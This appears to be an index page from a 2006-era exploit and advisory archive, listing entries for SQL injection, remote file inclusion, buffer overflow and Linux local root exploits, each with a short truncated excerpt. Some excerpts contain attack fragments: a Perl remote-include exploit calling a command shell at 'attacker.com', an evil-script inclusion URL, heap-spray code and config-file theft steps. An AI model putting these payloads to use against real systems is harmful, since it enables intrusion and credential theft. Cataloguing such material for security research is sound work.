Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)

source: https://www.securityfocus.com/bid/20655/info The Novell eDirectory server iMonitor is prone to a stack-based buffer-overflow vulnerability because it fails to perform sufficient bounds checking on client-supplied data before copying it to a buffer. An attacker could leverage this issue to...

Casinosoft Casino Script 3.2 - config.php SQL Injection

Casinosoft Casino Script 3.2 - config.php SQL Injection source: https://www.securityfocus.com/bid/20646/info Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue coul...

phpbbplusxl-rfi.txt

!/usr/bin/perl phpBB PlusXL 2.X biuld 272 Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high Site: http://www.xs4all.nl/hkicken/plusxl.htm use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socke...

phpmyteam20-rfi.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpMyTeam v2.0 = smileysdir Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by XORONturkish hacker...

OlateDownload 3.4 - details.php?page SQL Injection

OlateDownload 3.4 - details.php?page SQL Injection source: https://www.securityfocus.com/bid/20278/info OlateDownload is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. A...

US-CERT Technical Cyber Security Alert TA06-270A -- Microsoft Internet Explorer WebViewFolderIcon ActiveX Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-270A Microsoft Internet Explorer WebViewFolderIcon ActiveX Vulnerability Original release date: September 27, 2006 Last revised: -- Source: US-CERT Systems Affected Microsoft Windows...

Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow

v: behavior: urlVMLRender; var heapSprayToAddress = 0x05050505; var payLoadCode =...

Microsoft Internet Explorer (Windows XP SP2) - VML Remote Buffer Overflow

Microsoft Internet Explorer Windows XP SP2 - VML Remote Buffer Overflow v: behavior: urlVMLRender; var heapSprayToAddress = 0x05050505; var payLoadCode =...

ProgSys <= 0.156 (RR.php) Remote File Include Exploit

Exploit for unknown platform in category web applications ===================================================== ProgSys = 0.156 RR.php Remote File Include Exploit ===================================================== !/usr/bin/perl use LWP::UserAgent; ::::::::: :::::::::: ::: ::: ::::::::::: :::...

ZilekPortal 1.0 - Haberdetay.asp SQL Injection

ZilekPortal 1.0 - Haberdetay.asp SQL Injection source: https://www.securityfocus.com/bid/20062/info ZilekPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an...

hotplugCMSconfig.txt

Hello HotPlug CMS Config File Include Vulnerability Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [email protected] After Script Url Add includes/class/config.inc And you will download the config file ,, so that you will be able to connect by remote connect...

Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)

/ . \ \ \ \ | | / | | | | \ / / /\ \ / \ | \ / / / / 29\08\06 / || / / mm. dM8 YMMMb. dMM8 YMMMMb dMMM' YMMMb dMMMP There are doors I have yet to open YMMM MMM' windows I have yet to look through "MbdMP Going forward may not be the answer .dMMMMMM.P dMM MMMMMM maybe I should go back...

Bad ext3/nfs DoS bug

I've tried contacting the relevant maintainers directly, and it's even in the kernel bugzilla, but nothing's happened and it's been over a month now. No-one seems to be doing anyting about this. Is one meant to post this to bugtraq or what? Here's the bug:...

Cisco MARS &lt; 4.2.1 remote compromise

Cisco MARS Monitoring, Analysis and Response System, sometimes referred to as CS-MARS prior to version 4.2.1 ships with an unprotected JBoss installation which ultimately leads to a complete compromise of the device. The caveat here is that, despite much work on Cisco's part, they were not able t...

PHP Forge &lt;= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability

No description provided by source. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ phpforge3b2cfgracine Remote File Inclusion Vulnerability ------------------------ Virangar Security Team www.virangar.org public www.virangar.net priv8 -------- Discoverd By : Snake...

Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit

Exploit for linux platform in category local exploits ================================================== Linux Kernel Example: h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 if y0u dont have one, make big file 100MB in /tmp with dd and try to junk the cache e.g. cat /usr/lib/ /dev/null / include...

Flipper Poll &lt;= 1.1.0 Remote File Inclusion Vulnerability

Flipper Poll = 1.1.0 Remote File Inclusion Vulnerability ------------------------------------------ Discoverd By: XORON ------------------------------------------ cont@ct: x0r0nathotmaildotcom ------------------------------------------ Exploit: http://sitename.com/path/poll.php?rootpath=evilscrip...

Linux Kernel 2.6.13 &lt;= 2.6.17.4 sys_prctl() Local Root Exploit (3)

No description provided by source. / $Id: raptorprctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ raptorprctl.c - Linux 2.6.x suiddumpable vulnerability Copyright c 2006 Marco Ivaldi [email protected] The suiddumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16...

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit

Exploit for multiple platform in category remote exploits ================================================================== Webmin 1.290 / Usermin 1.220 Arbitrary File Disclosure Exploit ================================================================== ?php / Name : Webmin / Usermin Arbitrary...

Microsoft Internet Explorer 6 - ADODB.Recordset Filter Property Denial of Service

source: https://www.securityfocus.com/bid/18773/info Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'ADODB.Recordset Filter Property' COM object. A successful attack may cause the browser to fail due to a null-pointer dereference. Microsoft Internet...